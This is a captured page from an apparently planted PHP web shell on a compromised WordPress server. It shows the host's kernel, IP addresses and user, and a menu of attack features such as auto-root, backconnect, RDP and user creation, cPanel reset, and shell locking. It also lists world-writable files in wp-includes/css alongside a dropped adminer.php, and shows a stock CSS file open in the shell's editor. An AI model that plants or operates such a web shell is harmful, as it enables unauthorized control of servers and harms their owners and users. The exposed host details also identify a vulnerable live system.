Linux quad-clini-stageVM 5.4.0-1109-azure #115~18.04.1-Ubuntu SMP Mon May 22 20:06:37 UTC 2023 x86_64
Apache/2.4.29 (Ubuntu)
: 10.2.0.4 | : 13.59.217.1
Cant Read [ /etc/named.conf ]
7.4.25
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
lms /
wp-includes /
css /
[ HOME SHELL ]
Name
Size
Permission
Action
dist
[ DIR ]
drwxrwxrwx
admin-bar-rtl.css
24.16
KB
-rwxrwxrwx
admin-bar-rtl.min.css
19.84
KB
-rwxrwxrwx
admin-bar.css
24.12
KB
-rwxrwxrwx
admin-bar.min.css
19.84
KB
-rwxrwxrwx
adminer.php
465.43
KB
-rw-r--r--
buttons-rtl.css
9.41
KB
-rwxrwxrwx
buttons-rtl.min.css
5.72
KB
-rwxrwxrwx
buttons.css
9.37
KB
-rwxrwxrwx
buttons.min.css
5.72
KB
-rwxrwxrwx
classic-themes.css
729
B
-rwxrwxrwx
classic-themes.min.css
291
B
-rwxrwxrwx
customize-preview-rtl.css
3.58
KB
-rwxrwxrwx
customize-preview-rtl.min.css
2.81
KB
-rwxrwxrwx
customize-preview.css
3.54
KB
-rwxrwxrwx
customize-preview.min.css
2.8
KB
-rwxrwxrwx
dashicons.css
60.9
KB
-rwxrwxrwx
dashicons.min.css
57.63
KB
-rwxrwxrwx
editor-rtl.css
31.96
KB
-rwxrwxrwx
editor-rtl.min.css
26.35
KB
-rwxrwxrwx
editor.css
31.92
KB
-rwxrwxrwx
editor.min.css
26.34
KB
-rwxrwxrwx
jquery-ui-dialog-rtl.css
5.83
KB
-rwxrwxrwx
jquery-ui-dialog-rtl.min.css
4.45
KB
-rwxrwxrwx
jquery-ui-dialog.css
5.79
KB
-rwxrwxrwx
jquery-ui-dialog.min.css
4.44
KB
-rwxrwxrwx
media-views-rtl.css
56.6
KB
-rwxrwxrwx
media-views-rtl.min.css
45.63
KB
-rwxrwxrwx
media-views.css
56.56
KB
-rwxrwxrwx
media-views.min.css
45.62
KB
-rwxrwxrwx
wp-auth-check-rtl.css
2.49
KB
-rwxrwxrwx
wp-auth-check-rtl.min.css
1.87
KB
-rwxrwxrwx
wp-auth-check.css
2.45
KB
-rwxrwxrwx
wp-auth-check.min.css
1.87
KB
-rwxrwxrwx
wp-embed-template-ie.css
1.44
KB
-rwxrwxrwx
wp-embed-template-ie.min.css
1.44
KB
-rwxrwxrwx
wp-embed-template.css
7.75
KB
-rwxrwxrwx
wp-embed-template.min.css
6.8
KB
-rwxrwxrwx
wp-pointer-rtl.css
3.97
KB
-rwxrwxrwx
wp-pointer-rtl.min.css
3.17
KB
-rwxrwxrwx
wp-pointer.css
3.93
KB
-rwxrwxrwx
wp-pointer.min.css
3.16
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : customize-preview-rtl.css
/*! This file is auto-generated */ .customize-partial-refreshing { opacity: 0.25; transition: opacity 0.25s; cursor: progress; } /* Override highlight when refreshing */ .customize-partial-refreshing.widget-customizer-highlighted-widget { box-shadow: none; } /* Make shortcut buttons essentially invisible */ .widget .customize-partial-edit-shortcut, .customize-partial-edit-shortcut { position: absolute; float: right; width: 1px; /* required to have a size to be focusable in Safari */ height: 1px; padding: 0; margin: -1px -1px 0 0; border: 0; background: transparent; color: transparent; box-shadow: none; outline: none; z-index: 5; } /** * Styles for the actual shortcut * * Note that some properties are overly verbose to prevent theme interference. */ .widget .customize-partial-edit-shortcut button, .customize-partial-edit-shortcut button { position: absolute; right: -30px; top: 2px; color: #fff; width: 30px; height: 30px; min-width: 30px; min-height: 30px; line-height: 1 !important; font-size: 18px; z-index: 5; background: #3582c4 !important; border-radius: 50%; border: 2px solid #fff; box-shadow: 0 2px 1px rgba(60, 67, 74, 0.15); text-align: center; cursor: pointer; box-sizing: border-box; padding: 3px; animation-fill-mode: both; animation-duration: .4s; opacity: 0; pointer-events: none; text-shadow: 0 -1px 1px #135e96, -1px 0 1px #135e96, 0 1px 1px #135e96, 1px 0 1px #135e96; } .wp-custom-header .customize-partial-edit-shortcut button { right: 2px } .customize-partial-edit-shortcut button svg { fill: #fff; min-width: 20px; min-height: 20px; width: 20px; height: 20px; margin: auto; } .customize-partial-edit-shortcut button:hover { background: #4f94d4 !important; /* matches primary buttons */ } .customize-partial-edit-shortcut button:focus { box-shadow: 0 0 0 2px #4f94d4; } body.customize-partial-edit-shortcuts-shown .customize-partial-edit-shortcut button { animation-name: customize-partial-edit-shortcut-bounce-appear; pointer-events: auto; } body.customize-partial-edit-shortcuts-hidden .customize-partial-edit-shortcut button { animation-name: customize-partial-edit-shortcut-bounce-disappear; pointer-events: none; } .page-sidebar-collapsed .customize-partial-edit-shortcut button, .customize-partial-edit-shortcut-hidden .customize-partial-edit-shortcut button { visibility: hidden; } @keyframes customize-partial-edit-shortcut-bounce-appear { from, 20%, 40%, 60%, 80%, to { animation-timing-function: cubic-bezier(0.215, 0.610, 0.355, 1.000); } 0% { opacity: 0; transform: scale3d(.3, .3, .3); } 20% { transform: scale3d(1.1, 1.1, 1.1); } 40% { transform: scale3d(.9, .9, .9); } 60% { opacity: 1; transform: scale3d(1.03, 1.03, 1.03); } 80% { transform: scale3d(.97, .97, .97); } to { opacity: 1; transform: scale3d(1, 1, 1); } } @keyframes customize-partial-edit-shortcut-bounce-disappear { from, 20%, 40%, 60%, 80%, to { animation-timing-function: cubic-bezier(0.215, 0.610, 0.355, 1.000); } 0% { opacity: 1; transform: scale3d(1, 1, 1); } 20% { transform: scale3d(.97, .97, .97); } 40% { opacity: 1; transform: scale3d(1.03, 1.03, 1.03); } 60% { transform: scale3d(.9, .9, .9); } 80% { transform: scale3d(1.1, 1.1, 1.1); } to { opacity: 0; transform: scale3d(.3, .3, .3); } } @media screen and (max-width: 800px) { .widget .customize-partial-edit-shortcut button, .customize-partial-edit-shortcut button { right: -32px; } } @media screen and (max-width: 320px) { .widget .customize-partial-edit-shortcut button, .customize-partial-edit-shortcut button { right: -30px; } }
Close